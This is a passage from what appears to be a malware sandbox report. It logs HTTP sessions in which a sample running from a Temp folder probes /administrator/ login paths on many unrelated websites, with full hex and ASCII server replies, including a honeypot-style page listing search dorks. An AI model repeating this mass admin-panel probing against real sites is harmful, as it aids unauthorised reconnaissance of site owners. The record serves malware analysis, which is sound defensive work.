61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://waukesha-water.com/administrator/">here</a>.</p></body></html>
Feb 21, 2024 00:26:06.790438890 CET	191	OUT	GET /administrator/index.php HTTP/1.1 Host: waukesha-water.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:06.946717024 CET	473	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:06 GMT Server: Apache Location: https://waukesha-water.com/administrator/index.php Content-Length: 258 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 61 75 6b 65 73 68 61 2d 77 61 74 65 72 2e 63 6f 6d 2f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2f 69 6e 64 65 78 2e 70 68 70 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://waukesha-water.com/administrator/index.php">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.6	52093	162.215.240.240	80	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:06.631000042 CET	184	OUT	GET /administrator/ HTTP/1.1 Host: wefttechnologies.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:06.932284117 CET	226	IN	HTTP/1.1 409 Conflict Date: Tue, 20 Feb 2024 23:26:06 GMT Server: Apache Content-Length: 83 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 20 3d 20 22 68 75 6d 61 6e 73 5f 32 31 39 30 39 3d 31 22 3b 20 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 6c 6f 61 64 28 74 72 75 65 29 3c 2f 73 63 72 69 70 74 3e Data Ascii: <script>document.cookie = "humans_21909=1"; document.location.reload(true)</script>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.6	52103	45.147.96.4	80	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:06.631001949 CET	178	OUT	GET /administrator/ HTTP/1.1 Host: glazing-bt.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:06.804311991 CET	412	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Tue, 20 Feb 2024 23:26:06 GMT Content-Type: text/html Content-Length: 162 Connection: keep-alive Location: https://glazing-bt.com/administrator/ Strict-Transport-Security: max-age=31536000 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>
Feb 21, 2024 00:26:06.806499958 CET	187	OUT	GET /administrator/index.php HTTP/1.1 Host: glazing-bt.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:06.977786064 CET	421	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Tue, 20 Feb 2024 23:26:06 GMT Content-Type: text/html Content-Length: 162 Connection: keep-alive Location: https://glazing-bt.com/administrator/index.php Strict-Transport-Security: max-age=31536000 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.6	52090	213.186.33.4	80	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:06.631001949 CET	179	OUT	GET /administrator/ HTTP/1.1 Host: art-paix-di.org Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:06.795876026 CET	433	IN	HTTP/1.1 404 Not Found date: Tue, 20 Feb 2024 23:26:06 GMT content-type: text/html; charset=iso-8859-1 content-length: 196 server: Apache x-iplb-request-id: BF60E3DE:CB7A_D5BA2104:0050_65D5350C_13B39:7B84 x-iplb-instance: 51911 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Feb 21, 2024 00:26:06.803298950 CET	236	OUT	GET /administrator/index.php HTTP/1.1 Host: art-paix-di.org Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: http://art-paix-di.org/administrator/
Feb 21, 2024 00:26:06.967645884 CET	433	IN	HTTP/1.1 404 Not Found date: Tue, 20 Feb 2024 23:26:06 GMT content-type: text/html; charset=iso-8859-1 content-length: 196 server: Apache x-iplb-request-id: BF60E3DE:CB7A_D5BA2104:0050_65D5350E_14079:7B84 x-iplb-instance: 51911 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.6	52101	81.169.145.143	80	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:06.631180048 CET	178	OUT	GET /administrator/ HTTP/1.1 Host: d-brinkmann.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:06.812313080 CET	355	IN	HTTP/1.1 404 Not Found Date: Tue, 20 Feb 2024 23:26:06 GMT Server: Apache/2.4.58 (Unix) Content-Length: 196 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Feb 21, 2024 00:26:06.812815905 CET	234	OUT	GET /administrator/index.php HTTP/1.1 Host: d-brinkmann.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: http://d-brinkmann.de/administrator/
Feb 21, 2024 00:26:06.991524935 CET	355	IN	HTTP/1.1 404 Not Found Date: Tue, 20 Feb 2024 23:26:06 GMT Server: Apache/2.4.58 (Unix) Content-Length: 196 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.6	52102	185.39.146.199	80	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:06.631218910 CET	175	OUT	GET /administrator/ HTTP/1.1 Host: markoren.no Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:06.814100981 CET	112	IN	HTTP/1.1 302 Found content-length: 0 location: https://markoren.no/administrator/ cache-control: no-cache
Feb 21, 2024 00:26:06.815958023 CET	184	OUT	GET /administrator/index.php HTTP/1.1 Host: markoren.no Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:06.998754025 CET	121	IN	HTTP/1.1 302 Found content-length: 0 location: https://markoren.no/administrator/index.php cache-control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.6	52111	86.107.32.28	80	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:06.631223917 CET	177	OUT	GET /administrator/ HTTP/1.1 Host: collevilca.it Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:06.816755056 CET	1286	IN	HTTP/1.1 403 Forbidden Content-Type: text/html Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Expires: 0 Server: BitNinja Captcha Server Date: Tue, 20 Feb 2024 23:26:06 GMT Content-Length: 13701 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6a 6f 6f 6d 6c 61 2c 20 4a 6f 6f 6d 6c 61 2c 20 6a 6f 6f 6d 6c 61 20 31 2e 35 2c 20 77 6f 72 64 70 72 65 73 73 20 32 2e 35 2c 20 44 72 75 70 61 6c 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4a 6f 6f 6d 6c 61 21 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 4a 6f 6f 6d 6c 61 21 20 31 2e 35 20 2d 20 4f 70 65 6e 20 53 6f 75 72 63 65 20 43 6f 6e 74 65 6e 74 20 4d 61 6e 61 67 65 6d 65 6e 74 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 57 6f 72 64 50 72 65 73 73 20 32 2e 35 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 57 61 69 74 69 6e 67 20 66 6f 72 20 74 68 65 20 72 65 64 69 72 65 63 74 69 72 6f 6e 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 20 7b 77 69 64 74 68 3a 20 31 30 30 25 3b 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 20 6d 61 72 67 69 6e 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 73 70 61 6e 20 7b 63 6f 6c 6f 72 3a 20 23 38 37 38 37 38 37 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 74 3b 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 63 6f 6c 6f 72 3a 20 23 38 37 38 37 38 37 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 74 3b 20 74 65 78 74 2d 61 6c 69 Data Ascii: <!DOCTYPE HTML><html lang="en-US"> <head> <meta charset="UTF-8" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta name="robots" content="noindex, nofollow" /><meta name="keywords" content="joomla, Joomla, joomla 1.5, wordpress 2.5, Drupal" /><meta name="description" content="Joomla!" /><meta name="generator" content="Joomla! 1.5 - Open Source Content Management" /><meta name="generator" content="WordPress 2.5" /> <meta http-equiv="Content-Type" content="text/html;charset=UTF-8" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" /> <title>Waiting for the redirectiron...</title> <style type="text/css"> body {background-color: #ffffff; font-family: "Helvetica Neue", Helvetica,Arial,sans-serif;} html, body {width: 100%; height: 100%; margin: 0; padding: 0;} span {color: #878787; font-size: 12pt; text-align: center;} h1 {color: #878787; font-size: 18pt; text-ali
Feb 21, 2024 00:26:06.816786051 CET	1286	IN	Data Raw: 67 6e 3a 20 63 65 6e 74 65 72 3b 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 6c 69 6e 6b 20 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 34 30 70 78 3b 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 73 6b 2d 63 69 72 63 6c 65 20 7b 6d 61 72 67 69 6e 3a Data Ascii: gn: center;} .link {margin-top: 40px;} .sk-circle {margin: 80px auto;width: 100px;height: 100px;position: relative;} .sk-circle .sk-child {width: 100%;height: 100%;position: absolute;left: 0;top: 0;}
Feb 21, 2024 00:26:06.816806078 CET	1286	IN	Data Raw: 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 73 6b 2d 63 69 72 63 6c 65 20 2e 73 6b 2d 63 69 72 63 6c 65 38 20 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 32 31 30 64 65 67 29 3b 2d 6d 73 2d 74 72 61 6e 73 Data Ascii: } .sk-circle .sk-circle8 {-webkit-transform: rotate(210deg);-ms-transform: rotate(210deg);transform: rotate(210deg); } .sk-circle .sk-circle9 {-webkit-transform: rotate(240deg);-ms-transform: rotate(240deg);transform:
Feb 21, 2024 00:26:06.816822052 CET	1286	IN	Data Raw: 72 65 20 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 20 2d 30 2e 35 73 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 20 2d 30 2e 35 73 3b 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 73 6b 2d 63 69 72 63 6c Data Ascii: re {-webkit-animation-delay: -0.5s;animation-delay: -0.5s; } .sk-circle .sk-circle9:before {-webkit-animation-delay: -0.4s;animation-delay: -0.4s; } .sk-circle .sk-circle10:before {-webkit-animation-delay: -0.3s;animati
Feb 21, 2024 00:26:06.816864967 CET	1286	IN	Data Raw: 20 20 20 7d 2c 20 31 30 30 30 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 62 72 6f 77 73 65 72 49 6e 74 65 67 72 69 74 79 43 68 65 63 6b 28 29 20 7b 0a 20 20 20 20 20 20 20 20 Data Ascii: }, 1000); } function browserIntegrityCheck() { w = window.innerWidth; h = window.innerHeight; arr = [w, h, Math.floor((Math.random() * 9) + 1)]; arr.pus
Feb 21, 2024 00:26:06.816901922 CET	1286	IN	Data Raw: 74 72 69 6e 67 28 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 74 65 78 74 20 3d 20 22 22 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 70 6f 73 73 69 62 6c 65 20 3d 20 22 41 42 43 44 45 46 47 48 49 Data Ascii: tring() { var text = ""; var possible = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"; for (var i = 0; i < 5; i++) text += possible.charAt(Math.floor(Math.
Feb 21, 2024 00:26:06.816909075 CET	1286	IN	Data Raw: 22 63 65 6e 74 65 72 22 20 76 61 6c 69 67 6e 3d 22 6d 69 64 64 6c 65 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6e 6f 73 63 72 Data Ascii: "center" valign="middle"> <div> <noscript> <h1 style="color:#990000;">Please, turn Javascript on in your browser then reload the page.</h1> </noscript>
Feb 21, 2024 00:26:06.816915989 CET	1286	IN	Data Raw: 20 20 20 20 20 3c 68 31 3e 41 63 63 65 73 73 69 6e 67 20 2f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2f 20 73 65 63 75 72 65 6c 79 e2 80 a6 3c 2f 68 31 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c Data Ascii: <h1>Accessing /administrator/ securely</h1> <span>This is an automatic process. Your browser will redirect to your requested content in <span id="seconds">5</span> seconds.</span> <
Feb 21, 2024 00:26:06.816967964 CET	1286	IN	Data Raw: 73 20 61 62 6f 75 74 20 2f 63 6f 6d 70 6f 6e 65 6e 74 73 2f 63 6f 6d 5f 61 63 61 6a 6f 6f 6d 2f 20 3c 2f 61 3e 3c 62 72 3e 0a 3c 61 20 68 72 65 66 3d 27 69 6e 64 65 78 2e 70 68 70 3f 6f 70 74 69 6f 6e 3d 63 6f 6d 5f 63 6f 6e 74 65 6e 74 27 3e 54 Data Ascii: s about /components/com_acajoom/ </a><br><a href='index.php?option=com_content'>This contact form is about /components/com_content/ </a><br><a href='index.php?option=com_phocagallery'>This contact form is about /components/com_phocagallery/
Feb 21, 2024 00:26:06.816987038 CET	1286	IN	Data Raw: 74 6f 72 20 2d 20 55 70 6c 6f 61 64 65 72 73 20 54 65 73 74 73 27 3e 54 68 69 73 20 63 6f 6e 74 61 63 74 20 66 6f 72 6d 20 69 73 20 61 62 6f 75 74 20 2f 63 6f 6d 70 6f 6e 65 6e 74 73 2f 46 43 4b 65 64 69 74 6f 72 20 2d 20 55 70 6c 6f 61 64 65 72 Data Ascii: tor - Uploaders Tests'>This contact form is about /components/FCKeditor - Uploaders Tests/ </a><br><a href='index.php?option=phpmyadmin'>This contact form is about /components/phpmyadmin/ </a><br><a href='index.php?option=phpmyadmin2'>This c
Feb 21, 2024 00:26:06.817085981 CET	1086	IN	Data Raw: 74 3b 53 71 75 69 72 72 65 6c 4d 61 69 6c 20 76 65 72 73 69 6f 6e 20 31 2e 34 2e 34 26 71 75 6f 74 3b 20 69 6e 75 72 6c 3a 73 72 63 20 65 78 74 3a 70 68 70 29 3c 2f 61 3e 20 3c 62 72 3e 3c 62 72 3e 0a 3c 61 20 68 72 65 66 3d 22 2f 64 65 6d 6f 2f Data Ascii: t;SquirrelMail version 1.4.4" inurl:src ext:php)</a> <br><br><a href="/demo/?GHH v1.1 - WebUtil 2.7">GHDB Signature #1013 ("SquirrelMail version 1.4.4" inurl:src ext:php)</a> <br><br><a href="/demo/?GHH v1.1 - .mdb/admin.mdb">

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.6	52091	13.232.255.130	80	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:06.631341934 CET	183	OUT	GET /administrator/ HTTP/1.1 Host: amsantechnology.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:06.903847933 CET	421	IN	HTTP/1.1 302 Found Date: Tue, 20 Feb 2024 23:26:06 GMT Server: Apache Location: https://amsantechnology.com/administrator/ Content-Length: 226 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 6d 73 61 6e 74 65 63 68 6e 6f 6c 6f 67 79 2e 63 6f 6d 2f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://amsantechnology.com/administrator/">here</a>.</p></body></html>
